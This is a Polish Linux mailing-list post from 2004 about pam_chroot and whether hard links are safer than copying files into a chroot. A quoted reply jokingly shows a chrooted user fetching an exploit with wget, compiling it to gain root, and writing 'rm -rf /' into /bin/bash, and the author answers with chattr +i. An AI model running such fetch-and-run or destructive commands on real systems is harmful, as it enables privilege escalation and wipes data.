pam_chroot - problem
Maciej ''Kasprzol'' Kasprzyk
kasprzol w o2.pl
Czw, 16 Wrz 2004, 02:25:18 CEST
Dnia Thursday 16 September 2004 02:00, Lukasz Klimek napisał:
> On Wed, 15 Sep 2004 15:22:07 +0200, Maciej ''Kasprzol'' Kasprzyk
> <kasprzol w o2.pl> wrote:
> [...]
>
> > A tak z innej bajki - jak to jest na jednym systemie plików to nie lepiej
> > zamiast kopiowania utworzyć twarde dowiązania?
>
> nie :)
>
> ssh user w serwer...
> password: imieusera ;)
> // zachrootowany ;)
> [user w serwer ~] wget http://www.exploity.pl/exploit.c
> [user w serwer ~] gcc exploit.c && ./a.out
zakładając, że ma w chroot'cie dostęp do gcc :)
> exploit: you are root
> [root w serwer ~] echo rm -rf / > /bin/bash
chattr +i /bin/bash [1]
:)
Ale ok, rozumiem o co chodzi.
> ps. witam wszystkich, zapisałem się niedawno, bo testuję gmaila i chcę
> mieć dużo śmieci w skrzynce ;)
To ja ci daję zaproszenie, a ty sobie tam śmieci zbierasz? :)
[1] - no ale skoro jest już rootem i jak się domyśli to może zrobić
chmood -i /bin/bash :(
A to swoją drogą fajna rzecz - nawet root nie może usunąć pliku z +i bez
zdjęcia tegoż i najpierw.
--
pozdrawiam - Maciej "Kasprzol" Kasprzyk
http://home.wi.ps.pl/~mkasprzyk/ Linux Registered User # 224658
"Biologia poucza, że jeśli coś nas ugryzło, to z pewnością była to samica."
-------------- następna część ---------
Załącznik, który nie był tekstem został usunięty...
Name: nie znany
Type: application/pgp-signature
Size: 189 bytes
Desc: nie znany
Url : /mailman/pipermail/pld-users-pl/attachments/20040916/eff879b8/attachment-0001.bin
Więcej informacji o liście dyskusyjnej pld-users-pl